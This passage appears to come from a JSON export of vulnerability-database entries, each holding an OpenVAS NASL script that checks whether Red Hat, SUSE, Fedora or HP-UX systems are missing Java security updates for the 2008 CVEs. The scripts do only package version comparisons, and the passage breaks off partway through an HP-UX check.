((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-accessibility\", rpm:\"java-1.5.0-ibm-accessibility~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:18", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java2\n java2-jre\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5040565 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065118", "id": "OPENVAS:136141256231065118", "title": "SLES9: Security update for Sun Java", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5040565.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Sun Java\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java2\n java2-jre\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5040565 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65118\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5360\", \"CVE-2008-5359\", \"CVE-2008-5358\", \"CVE-2008-5357\", \"CVE-2008-5356\", \"CVE-2008-5344\", \"CVE-2008-5343\", \"CVE-2008-5342\", \"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5339\", \"CVE-2008-2086\", \"CVE-2008-5355\", \"CVE-2008-5354\", \"CVE-2008-5353\", \"CVE-2008-5352\", \"CVE-2008-5351\", \"CVE-2008-5350\", \"CVE-2008-5349\", \"CVE-2008-5348\", \"CVE-2008-5347\", \"CVE-2008-5345\", \"CVE-2008-5346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Sun Java\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java2\", rpm:\"java2~1.4.2~129.48\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:51", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0016.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the Security Alerts from IBM.\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.", "modified": "2017-07-12T00:00:00", "published": "2009-01-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63190", "id": "OPENVAS:63190", "title": "RedHat Security Advisory RHSA-2009:0016", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0016.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0016 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0016.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the Security Alerts from IBM.\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63190);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-20 22:42:09 +0100 (Tue, 20 Jan 2009)\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0016\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0016.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www-128.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-accessibility\", rpm:\"java-1.5.0-ibm-accessibility~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.9~1jpp.2.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:14", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065907", "id": "OPENVAS:136141256231065907", "type": "openvas", "title": "SLES10: Security update for IBM Java 1.5.0", "sourceData": "#\n#VID slesp2-java-1_5_0-ibm-5960\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.5.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65907\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for IBM Java 1.5.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm\", rpm:\"java-1_5_0-ibm~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-alsa\", rpm:\"java-1_5_0-ibm-alsa~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-devel\", rpm:\"java-1_5_0-ibm-devel~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-fonts\", rpm:\"java-1_5_0-ibm-fonts~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-jdbc\", rpm:\"java-1_5_0-ibm-jdbc~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-plugin\", rpm:\"java-1_5_0-ibm-plugin~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:17", "bulletinFamily": "scanner", "description": "Check for the Version of java-1.6.0-openjdk", "modified": "2017-07-10T00:00:00", "published": "2009-02-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=860412", "id": "OPENVAS:860412", "title": "Fedora Update for java-1.6.0-openjdk FEDORA-2008-10860", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.6.0-openjdk FEDORA-2008-10860\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"java-1.6.0-openjdk on Fedora 9\";\ntag_insight = \"The OpenJDK runtime environment.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-December/msg00384.html\");\n script_id(860412);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-16 14:16:57 +0100 (Mon, 16 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-10860\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5349\", \"CVE-2008-5347\", \"CVE-2008-5348\",\n \"CVE-2008-5360\", \"CVE-2008-5359\", \"CVE-2008-5351\", \"CVE-2008-5356\",\n \"CVE-2008-5352\", \"CVE-2008-5358\", \"CVE-2008-5353\", \"CVE-2008-5354\",\n \"CVE-2008-5357\");\n script_name( \"Fedora Update for java-1.6.0-openjdk FEDORA-2008-10860\");\n\n script_summary(\"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~0.20.b09.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:56", "bulletinFamily": "scanner", "description": "Check for the Version of Java", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=835195", "id": "OPENVAS:835195", "title": "HP-UX Update for Java HPSBUX02411", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02411\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Multiple remote vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities may allow remote unauthorized access, privilege escalation, \n execution of arbitrary code, and creation of a Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01683026-2\");\n script_id(835195);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02411\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_name( \"HP-UX Update for Java HPSBUX02411\");\n\n script_summary(\"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 